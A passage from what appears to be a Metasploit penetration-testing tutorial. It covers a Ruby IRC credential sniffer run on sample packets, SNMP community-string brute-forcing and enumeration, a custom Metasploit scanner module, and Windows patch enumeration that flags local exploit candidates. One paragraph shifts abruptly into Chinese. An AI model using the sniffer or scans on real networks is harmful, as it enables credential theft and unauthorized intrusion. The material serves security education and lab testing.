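      "#{pkt.src_ip}:#{pkt.src_port}-#{pkt.dst_ip}:#{pkt.dst_port}"
    end
  end

  def process(pkt)
    return if pkt.src_port != IRC_PORT && pkt.dst_port != IRC_PORT
    key = session_key(pkt)
    s = (@sessions[key] ||= { session: key })
    matched, matches = match_sigs(pkt.payload)
    case matched
    when :user
      s[:user] = matches
    when :pass
      s[:pass] = matches
      @logins << [s[:session], s[:user], s[:pass]] if s[:user] && s[:pass]
      @sessions.delete(key) # nothing more to track for this session
    when nil
      # no signature matched; keep the session and wait for more data
    end
  end

  private

  # First matching signature wins; returns [name, captured group] or [nil, nil].
  def match_sigs(data)
    SIGS.each do |name, re|
      m = re.match(data)
      return [name, m[1].strip] if m
    end
    [nil, nil]
  end
end

# Constructed capture: a client registers a nick, the server answers, then the
# client identifies to the nickname service.
SAMPLE_PACKETS = [
  Packet.new('10.0.0.5', 48614, '10.0.0.1', 6667, "NICK bacon\r\nUSER bacon 0 * :bacon\r\n"),
  Packet.new('10.0.0.1', 6667, '10.0.0.5', 48614, ":irc.example NOTICE bacon :This nickname is registered\r\n"),
  Packet.new('10.0.0.5', 48614, '10.0.0.1', 6667, "PRIVMSG NickServ :IDENTIFY hunter2\r\n")
].freeze

# Runs the sample capture through the sniffer and returns the logins found.
def sniff_sample
  sniffer = IrcSniffer.new
  SAMPLE_PACKETS.each { |p| sniffer.process(p) }
  sniffer.logins
end

if __FILE__ == $PROGRAM_NAME
  sniff_sample.each { |sess, user, pass| puts "-> IRC login sniffed: #{sess} >> #{user} / #{pass}" }
end
```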
5. SNMP Sweeping
1) SNMP Auxiliary Modules for Metasploit
Continuing with our information gathering, let's take a look at SNMP sweeping. SNMP sweeps are often good at finding a ton of information about a specific system or actually compromising the remote device. If you can find a Cisco device running a private string, for example, you can actually download the entire device configuration, modify it, and upload your own malicious config. Often, the passwords themselves are level 7 encoded, which means they are trivial to decode and obtain the enable or login password for the specific device.
Metasploit comes with a built-in auxiliary module specifically for sweeping SNMP devices. There are a couple of things to understand before we perform an SNMP sweep. First, "read-only" and "read-write" community strings play an important role in what kind of information can be extracted or modified on the device itself. If you can "guess" the read-only or read-write string, you can obtain quite a bit of access you would not normally have. Additionally, if Windows-based devices are configured with SNMP, often with RO/RW community strings, you can extract patch levels, services running, last reboot time, usernames on the system, routes, and various other amounts of information that are valuable to an attacker.
Note: By default, Metasploitable's SNMP service only listens on localhost. Many of the examples demonstrated here will require you to change these default settings. Open and edit /etc/default/snmpd and change the following from:
SNMPDOPTS='-Lsd -Lf /dev/null -u snmp -I -smux -p /var/run/snmpd.pid 127.0.0.1'
to
SNMPDOPTS='-Lsd -Lf /dev/null -u snmp -I -smux -p /var/run/snmpd.pid 0.0.0.0'
A service restart is required for the changes to take effect. Once restarted, you can now scan the service from the attacking machine.
2) What is a MIB?
When querying through SNMP, there is what is called an MIB API. MIB stands for Management Information Base. This interface allows you to query the device and extract information. Metasploit comes loaded with a list of default MIBs in its database, which it uses to query the device for more information depending on the level of access obtained. Let's take a look at the auxiliary modules.
msf > search snmp
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/misc/oki_scanner normal OKI Printer Default Login Credential Scanner
auxiliary/scanner/snmp/aix_version normal AIX SNMP Scanner Auxiliary Module
auxiliary/scanner/snmp/cisco_config_tftp normal Cisco IOS SNMP Configuration Grabber (TFTP)
auxiliary/scanner/snmp/cisco_upload_file normal Cisco IOS SNMP File Upload (TFTP)
auxiliary/scanner/snmp/snmp_enum normal SNMP Enumeration Module
auxiliary/scanner/snmp/snmp_enumshares normal SNMP Windows SMB Share Enumeration
auxiliary/scanner/snmp/snmp_enumusers normal SNMP Windows Username Enumeration
auxiliary/scanner/snmp/snmp_login normal SNMP Community Scanner
auxiliary/scanner/snmp/snmp_set normal SNMP Set Module
auxiliary/scanner/snmp/xerox_workcentre_enumusers normal Xerox WorkCentre User Enumeration (SNMP)
exploit/windows/ftp/oracle9i_xdb_ftp_unlock 2003-08-18 great Oracle 9i XDB FTP UNLOCK Overflow (win32)
exploit/windows/http/hp_nnm_ovwebsnmpsrv_main 2010-06-16 great HP OpenView Network Node Manager ovwebsnmpsrv.exe main Buffer Overflow
exploit/windows/http/hp_nnm_ovwebsnmpsrv_ovutil 2010-06-16 great HP OpenView Network Node Manager ovwebsnmpsrv.exe ovutil Buffer Overflow
exploit/windows/http/hp_nnm_ovwebsnmpsrv_uro 2010-06-08 great HP OpenView Network Node Manager ovwebsnmpsrv.exe Unrecognized Option Buffer Overflow
exploit/windows/http/hp_nnm_snmp 2009-12-09 great HP OpenView Network Node Manager Snmp.exe CGI Buffer Overflow
exploit/windows/http/hp_nnm_snmpviewer_actapp 2010-05-11 great HP OpenView Network Node Manager snmpviewer.exe Buffer Overflow
post/windows/gather/enum_snmp normal Windows Gather SNMP Settings Enumeration (Registry)
msf > use auxiliary/scanner/snmp/snmp_login
msf auxiliary(snmp_login) > show options
Module options (auxiliary/scanner/snmp/snmp_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no The password to test
PASS_FILE /usr/share/wordlists/fasttrack.txt no File containing communities, one per line
RHOSTS yes The target address range or CIDR identifier
RPORT 161 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USER_AS_PASS false no Try the username as the password for all users
VERBOSE true yes Whether to print output for all attempts
VERSION 1 yes The SNMP version to scan (Accepted: 1, 2c, all)
msf auxiliary(snmp_login) > set RHOSTS 192.168.0.0-192.168.5.255
rhosts => 192.168.0.0-192.168.5.255
msf auxiliary(snmp_login) > set THREADS 10
threads => 10
msf auxiliary(snmp_login) > run
[*] >> progress (192.168.0.0-192.168.0.255) 0/30208...
[*] >> progress (192.168.1.0-192.168.1.255) 0/30208...
[*] >> progress (192.168.2.0-192.168.2.255) 0/30208...
[*] >> progress (192.168.3.0-192.168.3.255) 0/30208...
[*] >> progress (192.168.4.0-192.168.4.255) 0/30208...
[*] >> progress (-) 0/0...
[*] 192.168.1.50 'public' 'APC Web/SNMP Management Card (MB:v3.8.6 PF:v3.5.5 PN:apc_hw02_aos_355.bin AF1:v3.5.5 AN1:apc_hw02_sumx_355.bin MN:AP9619 HR:A10 SN: NA0827001465 MD:07/01/2008) (Embedded PowerNet SNMP Agent SW v2.2 compatible)'
[*] Auxiliary module execution completed
As we can see here, we were able to find a community string of "public". This is most likely read-only and will not reveal a lot of information. We did learn that the device is an APC Web/SNMP device and the version it is running.
3) SNMP Enumeration
Using SNMP sweeping modules, we can gather a great deal of information such as open ports, services, hostnames, processes, and uptime, among other things. Using our Metasploitable virtual machine as our target, we will run the auxiliary/scanner/snmp/snmp_enum module and see what information it provides us. First, we load the module and set the "RHOST" option using the information stored in our workspace. Using hosts -R will set this option for us.
msf auxiliary(snmp_enum) > run
[+] 172.16.194.172, Connected.
[*] System information:
Host IP : 172.16.194.172
Hostname : metasploitable
Description : Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
Contact : msfdev@metasploit.com
Location : Metasploit Lab
Uptime snmp : 02:35:38.71
Uptime system : 00:20:13.21
System date : 2012-7-9 18:11:11.0
[*] Network information:
IP forwarding enabled : no
Default TTL : 64
TCP segments received : 19
TCP segments sent : 21
TCP segments retrans : 0
Input datagrams : 5055
Delivered datagrams : 5050
Output datagrams : 4527
...snip...
[*] Device information:
Id Type Status Descr
768 Processor unknown GenuineIntel: Intel(R) Core(TM) i7-2860QM CPU @ 2.50GHz
1025 Network unknown network interface lo
1026 Network unknown network interface eth0
1552 Disk Storage unknown SCSI disk (/dev/sda)
3072 Coprocessor unknown Guessing that there's a floating point co-processor
[*] Processes:
Id Status Name Path Parameters
1 runnable init /sbin/init
2 runnable kthreadd kthreadd
3 runnable migration/0 migration/0
4 runnable ksoftirqd/0 ksoftirqd/0
5 runnable watchdog/0 watchdog/0
6 runnable events/0 events/0
7 runnable khelper khelper
41 runnable kblockd/0 kblockd/0
68 runnable kseriod kseriod
...snip...
5696 runnable su su
5697 runnable bash bash
5747 running snmpd snmpd
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
4) Reviewing Our SNMP Scan
The above output provided by our SNMP sweep gives us a large amount of information about our target system. Although cropped for length, we can still see a lot of relevant information about our target, such as its processor type, process IDs, and so on.
6. Writing Your Own Security Scanner
1) Using Your Own Metasploit Auxiliary Module
Sometimes you may need a specific network security scanner, or there is scanning activity that is easier to script within Metasploit than with an external program. Metasploit has a lot of features that can come in handy, such as access to all of the exploit classes and methods, built-in support for proxies, SSL, and reporting, and built-in threading. Think of instances where you might need to find every instance of a password on a system, or scan for a custom service. Not to mention, writing your own custom scanner is fairly quick and easy.
Some of the many Metasploit scanner features are:
- It provides access to all exploit classes and methods
- Provides support for proxies, SSL, and reporting
- Built-in threading and range scanning
- Easy to write and run quickly
Writing your own scanner module can also be extremely useful during security audits, as it allows you to locate every instance of a bad password, or to scan internally for a vulnerable service that needs to be patched. Using the Metasploit Framework will allow you to store this information in the database for organization and later reporting needs.
We will use this very simple TCP scanner, which connects to a host on a default port of 12345 that can be changed at runtime via the scanner module options. Upon connecting to the server, it sends "HELLO SERVER", receives the response, and prints it out along with the IP address of the remote host.
require 'msf/core'

class Metasploit3 < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Scanner

  def initialize
    super(
      'Name'        => 'My custom TCP scan',
      'Version'     => '$Revision: 1 $',
      'Description' => 'My quick scanner',
      'Author'      => 'Your name here',
      'License'     => MSF_LICENSE
    )
    register_options(
      [
        Opt::RPORT(12345)
      ], self.class)
  end

  # Called once per target host by the Scanner mixin
  def run_host(ip)
    connect()
    greeting = "HELLO SERVER"
    sock.puts(greeting)
    data = sock.recv(1024)
    print_status("Received: #{data} from #{ip}")
    disconnect()
  end
end
2) Saving and Testing Our Auxiliary Module
We save the file as simple_tcp.rb into the ./modules/auxiliary/scanner/ directory and load up msfconsole. It is important to note two things here. First, modules are loaded at runtime, so our new module will not show up unless we restart our interface of choice. Second, the folder structure is very important: if we saved our scanner under ./modules/auxiliary/scanner/http/, it would show up in the modules list as scanner/http/simple_tcp.
To test our security scanner, set up a netcat listener on port 12345 and pipe in a text file to act as the server response.
root@kali:~# nc -lnvp 12345 < response.txt
listening on [any] 12345 ...
Next, we select our new scanner module, set its parameters, and run it to see the results.
msf > use scanner/simple_tcp
msf auxiliary(simple_tcp) > set RHOSTS 192.168.1.100
RHOSTS => 192.168.1.100
msf auxiliary(simple_tcp) > run
[*] Received: hello metasploit from 192.168.1.100
[*] Auxiliary module execution completed
As you can see from this simple example, this level of versatility can be of great help when you need some custom code in the middle of a penetration test. The power of the framework and reusable code really shines through here.
3) Reporting Results from Our Security Scanner
The Report mixin provides the report_*() methods. These methods depend on the database in order to operate:
- Check for a live database connection
- Check for a duplicate record
- Write the record into the table
The database driver is now loaded automatically.
db_driver postgres (or sqlite3, mysql)
Use the Auxiliary::Report mixin in your scanner code.
include Msf::Auxiliary::Report
Then, call the report_note() method.
report_note(
:host => rhost,
:type => "myscanner_password",
:data => data
)
学习编写自己的网络安全扫描程序似乎是一项艰巨的任务,但正如我们刚刚展示的那样,创建自己的网络安全扫描程序的好处辅助模块容纳和运行我们的安全扫描程序将帮助我们存储和组织数据,更不用说在渗透测试期间帮助我们撰写报告了。
7. WINDOWS 补丁枚举
1)枚举已安装的 WINDOWS 修补程序
当遇到 Windows 目标时,确定已应用哪些修补程序是了解是否定期更新的简单方法。它还可能提供有关系统上存在的其他可能漏洞的信息。
专门为此任务创建了一个辅助模块,称为enum_patches。与任何后开发模块一样,它是使用 use
命令加载的。
msf exploit(handler) > use post/windows/gather/enum_patches
msf post(enum_patches) > show options
Module options (post/windows/gather/enum_patches):
Name Current Setting Required Description
---- --------------- -------- -----------
KB KB2871997, KB2928120 yes A comma separated list of KB patches to search for
MSFLOCALS true yes Search for missing patchs for which there is a MSF local module
SESSION yes The session to run this module on.
This module also has some advanced options, which can be displayed with the show advanced command.
msf post(enum_patches) > show advanced
Module advanced options (post/windows/gather/enum_patches):
Name : VERBOSE
Current Setting: true
Description : Enable detailed status messages
Name : WORKSPACE
Current Setting:
Description : Specify the workspace for this module
Once a Meterpreter session is launched against a Windows target, load the enum_patches module and set the "session" option. Once done, the run command will launch the module against our target.
msf post(enum_patches) > show options
Module options (post/windows/gather/enum_patches):
Name Current Setting Required Description
---- --------------- -------- -----------
KB KB2871997, KB2928120 yes A comma separated list of KB patches to search for
MSFLOCALS true yes Search for missing patchs for which there is a MSF local module
SESSION 1 yes The session to run this module on.
msf post(enum_patches) > run
[*] KB2871997 applied
[+] KB2928120 is missing
[+] KB977165 - Possibly vulnerable to MS10-015 kitrap0d if Windows 2K SP4 - Windows 7 (x86)
[*] KB2305420 applied
[+] KB2592799 - Possibly vulnerable to MS11-080 afdjoinleaf if XP SP2/SP3 Win 2k3 SP2
[+] KB2778930 - Possibly vulnerable to MS13-005 hwnd_broadcast, elevates from Low to Medium integrity
[+] KB2850851 - Possibly vulnerable to MS13-053 schlamperei if x86 Win7 SP0/SP1
[+] KB2870008 - Possibly vulnerable to MS13-081 track_popup_menu if x86 Windows 7 SP0/SP1
[*] Post module execution completed